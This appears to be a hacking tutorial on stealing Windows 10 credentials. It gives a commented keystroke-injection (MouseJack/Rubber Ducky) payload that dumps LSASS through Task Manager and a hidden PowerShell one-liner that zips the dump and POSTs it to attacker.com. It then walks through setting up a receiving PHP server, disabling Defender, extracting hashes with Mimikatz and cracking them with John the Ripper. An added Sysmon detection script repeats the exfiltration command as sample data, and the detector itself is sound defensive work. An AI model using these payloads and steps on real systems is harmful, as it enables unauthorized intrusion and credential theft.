Windows 10 passwords stored as NTLM hashes (or, more accurately, NT hashes) can be dumped in seconds and transferred to an attacker's system. The hashes can then be brute-forced and cracked to reveal the plaintext passwords with a combination of tools, including Mimikatz, ProcDump, John the Ripper, and Hashcat.
Before We Begin: The Local Security Authority Subsystem Service (LSASS) is an integral part of the Windows operating system.
LSASS is responsible for domain authentication, Active Directory management, and security policy enforcement. It spawns the processes responsible for authenticating users with NTLM and verifies the validity of logins. Because it is so critical to the operating system, hackers often name malicious executables after the process.
Windows Defender and antivirus software now detect Mimikatz executables and signatures far more effectively (see below).
In combination with Mimikatz, hackers now use ProcDump, a standalone Microsoft executable designed for administrators to monitor application crashes.
ProcDump is used to extract an LSASS dump, which is later moved to an offline Windows 10 computer and parsed with Mimikatz. This is still an effective way to extract credentials from Windows 10 because ProcDump is a signed Microsoft binary and is not flagged by most antivirus programs (see below).
The Windows 10 Task Manager can also be used to save LSASS memory without the help of Mimikatz or ProcDump. The following is an example of a MouseJack payload designed to extract and exfiltrate the LSASS dump using only keystroke injection and PowerShell. The attack completes in less than ten seconds (it was slowed down in places to make it easier to follow).
Task Manager is opened from the Run window with administrator privileges. The screen goes blank for one second because of the User Account Control (UAC) prompt, which prevents the GIF recorder from capturing the screen. The Local Security Authority Process (lsass.exe) is then located in the process list and dumped (by default) to the %TEMP% directory. A PowerShell one-liner is then executed entirely through the Run window; it compresses the LSASS dump into a ZIP file and sends it to the attacker's server.
At this point, the attacker can use Mimikatz on an offline Windows 10 computer or a virtual machine (with no antivirus software installed) to extract the password hashes.
Although the MouseJack vulnerabilities became known a few years ago, tens of millions of keyboards and mice (including Logitech devices) are still susceptible to keystroke injection. As Marcus Mengs, creator of P4wnP1, demonstrates in his proof-of-concept video, Logitech dongles remain vulnerable to remote attacks.
For clarity, comments (REM) were added to each line of the payload.
REM A 2.5-second delay gives the USB Rubber Ducky time to mount. This
REM initial delay is not required for mousejack attacks.
REM Open the Run window.
REM The Run window takes 1 second to open.
REM Type "taskmgr" (i.e. Task Manager) into the Run window.
REM Delay for 0.5 seconds.
REM The Ctrl + Shift + Enter key combination is pressed to trigger the
REM User Account Control (UAC) prompt. This causes taskmgr to open with
REM administrator rights.
CTRL-SHIFT ENTER
REM Allow the UAC window to pop up. This may take a few seconds on
REM some Windows 10 computers.
REM The ALT + y keyboard shortcut accepts the User Account Control
REM prompt.
REM Wait a few seconds for Task Manager to open completely with
REM administrator rights. This took (on average) 5.5 seconds in my
REM tests. On computers with high-end CPUs, this delay can be
REM significantly lower.
REM Press the down arrow to move from the toolbar to the list of
REM active background processes.
REM Type "local" to jump down and highlight "Local Security
REM Authority Service".
REM The SHIFT + F10 shortcut invokes the right-click options menu.
SHIFT F10
REM The options menu opens completely after 1.2 seconds.
REM Press the down arrow four times to highlight "Create dump file".
REM Press Enter to select "Create dump file".
REM Wait 3.5 seconds for the dump file to be created and saved in
REM the %TEMP% directory.
REM Press Enter to select "OK" and close the dump popup window.
REM The ALT + F4 combination closes the Task Manager window.
REM Wait 0.7 seconds for Task Manager to close.
REM Reopen the Run window.
REM Wait 0.7 seconds for the Run window to open.
REM PowerShell one-liner for compressing and exfiltrating the LSASS
REM dump file. Every part of the one-liner is explained in greater
REM detail below.
STRING powershell -ep bypass /w 1 /C $t=$env:temp;$l='lsass.DMP';compress-archive -path $t\$l -destinationpath $t\a.zip;iwr attacker.com/i.php -method POST -Infile $t\a.zip
REM Press Enter to run the PowerShell one-liner.
The PowerShell payload consists of several commands concatenated with semicolons:
powershell -ep bypass /w 1 /C – The ExecutionPolicy (-ep) is set to "bypass", which lets the script run on Windows despite Defender and some antivirus software. The WindowStyle (/w) is set to "1", which immediately hides the PowerShell popup terminal.
$t=$env:temp; – The target's temporary directory is assigned to $t. Using single-letter variables helps to shorten the overall payload length; it is more efficient than typing "C:\Users\%USERNAME%\AppData\Local\Temp" over and over again.
$l='lsass.DMP'; – The lsass.DMP filename is assigned to the $l variable. This file name is set automatically by Task Manager.
compress-archive -path $t\$l -destinationpath $t\a.zip; – The Compress-Archive PowerShell cmdlet compresses lsass.DMP (-path) into the a.zip (-destinationpath) file.
iwr attacker.com/i.php -method POST -Infile $t\a.zip – Invoke-WebRequest (iwr) sends a.zip (-infile) to the attacker's server as a POST request. Make sure "attacker.com" is changed to Kali's local IP address or the address of a virtual private server.
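As an added example (not part of the original article), the following Python detector runs over constructed Sysmon-style events (JSON, one per line) and flags the three observable steps of this technique: a non-allowlisted process opening lsass.exe with read access (Event ID 10), a file named lsass*.dmp being written (Event ID 11), and a PowerShell command line that references the dump together with archive or upload cmdlets (Event ID 1). The field names follow Sysmon's; the sample events and the allowlist are constructed assumptions to be tuned per environment.

```python
import json
import re
from ntpath import basename   # handles Windows paths on any OS

PROCESS_VM_READ = 0x0010      # access right required to read LSASS memory
# Processes that legitimately open lsass.exe; an assumption, tune per environment.
BENIGN_SOURCES = {"svchost.exe", "csrss.exe", "wininit.exe", "msmpeng.exe"}
DUMP_FILE = re.compile(r"^lsass.*\.dmp$", re.IGNORECASE)
ARCHIVE_OR_UPLOAD = r"(compress-archive|invoke-webrequest|\biwr\b)"
EXFIL_CMD = re.compile(rf"{ARCHIVE_OR_UPLOAD}.*lsass|lsass.*{ARCHIVE_OR_UPLOAD}", re.IGNORECASE)

def inspect(event):
    """Return an alert reason for one Sysmon-style event, or None."""
    eid = event.get("EventID")
    if eid == 10 and basename(event.get("TargetImage", "")).lower() == "lsass.exe":
        src = basename(event.get("SourceImage", "")).lower()
        access = int(event.get("GrantedAccess", "0"), 16)
        if access & PROCESS_VM_READ and src not in BENIGN_SOURCES:
            return f"{src} opened lsass.exe with VM_READ (GrantedAccess={event['GrantedAccess']})"
    elif eid == 11 and DUMP_FILE.match(basename(event.get("TargetFilename", ""))):
        return f"{basename(event.get('Image', '?'))} wrote LSASS dump {event['TargetFilename']}"
    elif eid == 1 and EXFIL_CMD.search(event.get("CommandLine", "")):
        return "PowerShell command line references an lsass dump with archive/upload cmdlets"
    return None

def detect(raw_events):
    """Run inspect() over newline-delimited JSON events; return (EventID, reason) pairs."""
    alerts = []
    for line in raw_events.strip().splitlines():
        event = json.loads(line)
        reason = inspect(event)
        if reason:
            alerts.append((event["EventID"], reason))
    return alerts

# Constructed sample events (not real telemetry); JSON needs \\ for each backslash.
SAMPLE_EVENTS = r"""
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\Taskmgr.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF"}
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\svchost.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000"}
{"EventID": 11, "Image": "C:\\Windows\\System32\\Taskmgr.exe", "TargetFilename": "C:\\Users\\bob\\AppData\\Local\\Temp\\lsass.DMP"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -ep bypass /w 1 /C $t=$env:temp;$l='lsass.DMP';compress-archive -path $t\\$l -destinationpath $t\\a.zip;iwr attacker.com/i.php -method POST -Infile $t\\a.zip"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -c Get-Date"}
"""

if __name__ == "__main__":
    for eid, reason in detect(SAMPLE_EVENTS):
        print(f"[Sysmon {eid}] {reason}")
```

Enabling LSA protection (RunAsPPL) or Credential Guard stops the Task Manager dump itself; the detection above is the compensating control where that is not yet deployed.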
Step 2: Intercepting the LSASS Dump
Before performing the keystroke injection, a PHP server is required to receive the exfiltrated dump.
The keystroke payload expects a server on port 80. In this example, Kali Linux is used on a local network for simplicity, so root privileges are already in use. Setting up on a virtual private server likewise requires root to open a listening service on port 80.
Non-Kali users can become root with the following command.
~$ sudo su
Then create a directory named "phpServer/" with the mkdir command.
~$ mkdir phpServer/
Use the cd command to change into the phpServer/ directory.
~$ cd phpServer/
Create a file named "i.php" with nano.
~$ nano i.php
Paste the following PHP script into the nano terminal. Once this is done, press Ctrl + x, then y, then Enter to save and exit nano.
This simple PHP script catches ZIP files and does not need to be modified in any way to work. When the Windows 10 target sends a ZIP file, this PHP server saves the data using the current time as the file name.
Start the PHP server with the command php -S 0.0.0.0:80. The -S tells PHP to start a web server, while 0.0.0.0 instructs it to listen on every IPv4 interface.
~$ php -S 0.0.0.0:80
PHP 7.3.0-2 Development Server started
Listening on http://0.0.0.0:80
Document root is /root/phpServer
Press Ctrl-C to quit.
Step 3: Extracting the Hashes with Mimikatz
After the ZIP file has been intercepted, move it to a Windows 10 computer or virtual machine and extract it to find the lsass.DMP file.
Disable Windows Defender and other security features before downloading Mimikatz. Open the Start menu and search for "Virus".
Click "Virus & threat protection settings" and deselect all available options. Alternatively, a virtual machine without Windows Defender or SmartScreen can be set up for the Mimikatz antics.
At the time of writing, the latest version of Mimikatz is 2.2.0 (the Carlos update). Open a web browser and navigate to its GitHub repository to find the latest mimikatz_trunk.zip.
After unzipping the Mimikatz ZIP file, open a PowerShell terminal and use the following command to run mimikatz.exe. The mimikatz prompt appears.
PS C:\> & C:\Users\$env:username\PATH\TO\MIMIKATZ\x64\mimikatz.exe
  .#####.   mimikatz 2.2.0 (x64) #18362 Aug 13 2019 01:35:04
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( email@example.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( firstname.lastname@example.org )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/
The sekurlsa::minidump command loads lsass.DMP into Mimikatz.
Then use the sekurlsa::logonPasswords command to extract the hashed credentials. Since Windows 8, plaintext passwords are no longer stored unless the operating system is modified further. However, this does not mean that Windows 10 hashes cannot be brute-forced and easily cracked. In line 12 we find the hashed password in NTLM format.
As a small experiment, I wanted to know how long a Raspberry Pi 3B+, a common Intel i7 CPU, and a GeForce GTX GPU would need to crack the same hash, whose password consists of six random lowercase letters followed by two random digits (for example: nchfyr56).
1. Brute Force with Raspberry Pi 3B+ (John the Ripper)
~$ john --mask='?l?l?l?l?l?l?d?d' --format=NT /root/Desktop/hash
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 32/32])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
1g 0:05:19:24 DONE (2018-06-22 16:36) 0.000052g/s 1389Kp/s 1389Kc/s 1389KC/s achfyr56..zuhfyr56
Use the "--show --format=NT" options to display all of the cracked passwords reliably
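To put the Raspberry Pi result in context, here is an added Python helper (not from the original article) that computes the keyspace of a John/Hashcat mask, parses the elapsed time and candidate rate from the status line above, and reports how much of the keyspace had been tried and the worst-case time to exhaust it. The character-class sizes and the status-line layout are assumptions based on John's usual output; the 12-character ?a mask is included only to show how quickly a longer password policy puts this hardware out of reach.

```python
import re

# Candidate count per mask character class (John/Hashcat built-in classes).
MASK_CLASSES = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95}
RATE_RE = re.compile(r"([\d.]+)([KMG]?)p/s")            # e.g. "1389Kp/s"
STATUS_RE = re.compile(r"^\d+g (\d+):(\d+):(\d+):(\d+) ")  # "1g D:HH:MM:SS "

def mask_keyspace(mask):
    """Number of candidates a mask such as ?l?l?l?l?l?l?d?d generates."""
    tokens = re.findall(r"\?([ludsa])", mask)
    if len(tokens) * 2 != len(mask):
        raise ValueError("mask must consist only of ?x tokens")
    total = 1
    for t in tokens:
        total *= MASK_CLASSES[t]
    return total

def parse_status(line):
    """Extract elapsed seconds and candidates/second from a John status line."""
    m = STATUS_RE.match(line)
    days, hours, mins, secs = (int(x) for x in m.groups())
    elapsed = ((days * 24 + hours) * 60 + mins) * 60 + secs
    r = RATE_RE.search(line)
    rate = float(r.group(1)) * {"": 1, "K": 1e3, "M": 1e6, "G": 1e9}[r.group(2)]
    return elapsed, rate

def coverage(mask, line):
    """Fraction of the keyspace tried so far and worst-case seconds to exhaust it."""
    elapsed, rate = parse_status(line)
    space = mask_keyspace(mask)
    return elapsed * rate / space, space / rate

# Status line copied from the Raspberry Pi run above.
PI_STATUS = ("1g 0:05:19:24 DONE (2018-06-22 16:36) 0.000052g/s "
             "1389Kp/s 1389Kc/s 1389KC/s achfyr56..zuhfyr56")

if __name__ == "__main__":
    for mask in ("?l?l?l?l?l?l?d?d", "?a?a?a?a?a?a?a?a?a?a?a?a"):
        tried, worst = coverage(mask, PI_STATUS)
        print(f"{mask}: keyspace={mask_keyspace(mask):.3e} "
              f"tried={tried:.1%} worst case={worst / 3600:.1f} h")
```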